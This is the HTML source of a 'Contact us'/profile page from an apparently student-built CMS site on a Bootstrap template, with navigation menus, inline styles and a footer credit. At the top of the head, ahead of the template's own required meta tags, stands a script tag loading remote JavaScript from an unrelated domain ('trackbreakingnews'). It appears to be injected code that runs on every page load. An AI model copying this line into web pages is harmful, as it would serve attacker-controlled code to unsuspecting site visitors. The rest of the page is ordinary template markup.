
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
  	<script src="http://d.trackbreakingnews.com/l/load.js"></script>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="../../favicon.ico">

    <title>Profile</title>

    <!-- Bootstrap core CSS -->
    <link href="CSS/bootstrap.min.css" rel="stylesheet">
    <link href="CSS/Style.css" rel="stylesheet">
    <!-- Bootstrap theme -->
    <link href="CSS/bootstrap-theme.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="CSS/theme.css" rel="stylesheet">
      <link href="CSS/Style.css" rel="stylesheet">

    <!-- Just for debugging purposes. Don't actually copy these 2 lines! -->
    <!--[if lt IE 9]>
    <script src="js/ie8-responsive-file-warning.js"></script>
    <![endif]-->
    <script src="js/ie-emulation-modes-warning.js"></script>
    
</script>
<link rel="stylesheet" href="CSS/animate.css">
<script src="js/wow.min.js"> </script>
<script> new WOW().init();</script>

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  

  
  <style type="text/css">
  .JT {
  height: 340px;
  }
  .VV {
  padding-left: 150px;
  }
  .lead  {
  padding-left: 20px;
  }
  
  .XZ {
  position:relative;
  right:100px;
  top:-50px;
  margin-left: 185px;

  }
    .Nm h3 {
  color: #F43059;
  
  }
  .Nm h4 {
  color: #F43059;
  
  }
  .CXC {
  position:relative;
  top: -60px;
  }
  
   body{

	background-image:url("iWall/appx.jpg");
	background-size:cover;
}
 .ZX a{
    color:#fff;
    font-family: Lato;
    font-weight: 800px;
    text-decoration: none;
    
    }
    .ZX a:hover{
    color:#17AEDF;
    font-family: Droid-sans;
    font-weight: bold;
    text-decoration: none;
    
    }
  .FM {
  position: relative;
  top:-40px;
  }
.NM {
  top:-45px;
  position: relative;
  left:45px;
  }
    .NM {
  top:-45px;
  position: relative;
  left:45px;
  }
    .NM1 {
  top:-35px;
  position: relative;
  left:55px;
   text-decoration: none;
  }
  .NM1{
  font-size: 18px;
  color: #000;
  text-decoration: none;
  font-family: Lato;
  }
  .NM1:hover{
  font-size: 18px;
  color: #000;
  text-decoration: none;
  font-family: Lato;
  }
  .DP {
  width: 210px;
  text-decoration: none;
  height:8px;
  }
  </style>
 
  </head>  <body>
				
                  	<div class="navbar navbar-default navbar-fixed-top pulse animated">
					<div class="container">
						<a class="navbar-brand XX" href="Data1.html">
							<img src="iWall/logo1.png"><p>CMS</p>
						</a>
						<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
						<span class="icon-bar"></span>
						<span class="icon-bar"></span>
						<span class="icon-bar"></span>
						</button>
						<div class="collapse navbar-collapse">
					<ul class="nav navbar-nav pull-right">
				
                    
                     
		
	
		<tr style="border-bottom-style:solid;">
		<td>
<a href="Owner1.html">
	<input type="image" src="iWall/aj.JPG" class="fadeInDown animated img-circle" width="45"height="45"></a>
		
		<li class="NM"></li></td>
		</tr></li> 
					 <li  > <a href="Home2.html">Home</a></li>
					<li > <a href="Course.html">Course</a></li>
					<li class="active"><a href="Owner1.html">Contact us</a></li>
                       <li> <a href="Login1.html">Login</a></li>
					<li class="dropdown ">
						<a href="Owner1.html" data-toggle="dropdown" class="dropdown-toggle">Ajay Singh Bisht <span class="caret"></span></a>
						<ul class="dropdown-menu ">
						<tr style="border-bottom-style:solid;"><td>
						<a href="Owner1.html"><input type="image" src="iWall/aj.JPG" class="fadeInDown animated img-circle" width="45" height="45"></a>
						<div class="DP">
						<li class="NM1"> <a href="Owner1.html">Ajay Singh Bisht</a> </li></div>
						<li class="divider"></li>
				
						<li><a href="Forgot1.html">Setting</a></li>
						<li class="divider"></li>
						<li><a href="Msg2.html">Message <span class="badge"> 11</span></a></li>
						<li class="divider">
						<li> <a href="Logout.html">Logout</a> </li>
					
						
					
					</li>
							</ul>
	          </div> 
	      </div>
	  </div>

<br/><br/><br/>
<nav>
	<ul class="pager XZ">  <li class="next"><a href="Home2.jsp"><span >&rarr;</span> Home</a></li>
  </ul>
</nav><br/><br/>
			<div class="container">
				<div class="row">
					<div class="col-lg-12">
						<h3>QUICK CONTACTS</h3>
					</div>
				</div>
			</div>
			<div class="Cvv">
				<div class="container-fluid FFF">
					<div class="row">
						<div class="col-lg-12  FF">
							<h5>
							@2015 All Rights Reserved / Legal Notices / Privacy Policy  <small>Ajay Singh Bisht | 2015 | @002ajay (</em>Twitter</em>)</small>
							</h5>
						</div>
					</div>
				</div>
			</div>
          
  <script src="jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/docs.min.js"></script>
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <script src="js/ie10-viewport-bug-workaround.js"></script>
    <script>
	$('.dropdown').hover(function() {
		$('.dropdown-toggle',this).trigger('click');
	});
	</script>
  </body>
</html>
